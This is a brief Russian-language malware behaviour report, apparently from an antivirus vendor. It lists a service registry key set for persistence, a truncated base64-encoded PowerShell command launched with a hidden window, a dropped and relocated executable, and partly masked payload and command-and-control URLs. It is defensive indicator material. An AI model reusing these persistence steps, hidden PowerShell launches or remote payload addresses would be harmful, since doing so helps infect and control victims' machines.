Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\whichwhich] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\whichwhich] 'ImagePath' = '"%WINDIR%\SysWOW64\whichwhich.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABXAGoAZwByAHYAZgBqAGQAagA9ACcAVQBpAGcAdQBiAGkAbABiAGYAbABhACcAOwAkAEUAdwB5AHAAbQBtAHYAaQBhAGYAZAB0AGMAIAA9ACAAJwA2ADIANAAnADsAJABHAGkAcgB5AGEAZABuAHkAagBqAHoAPQAnAEMAcgB2AHQAcABqAHgAcgA...
- %HOMEPATH%\624.exe
- %HOMEPATH%\624.exe в %WINDIR%\syswow64\whichwhich.exe
- http://ac####y.seongon.com/wp-content/4h2x11317/
- http://18#.##3.113.67:443/iplk/taskbar/ringin/merge/ via 18#.#73.113.67
- DNS ASK ac####y.seongon.com
- '%HOMEPATH%\624.exe'
- '%WINDIR%\syswow64\whichwhich.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABXAGoAZwByAHYAZgBqAGQAagA9ACcAVQBpAGcAdQBiAGkAbABiAGYAbABhACcAOwAkAEUAdwB5AHAAbQBtAHYAaQBhAGYAZAB0AGMAIAA9ACAAJwA2ADIANAAnADsAJABHAGkAcgB5AGEAZABuAHkAagBqAHoAPQAnAEMAcgB2AHQAcABqAHgAcgA...' (со скрытым окном)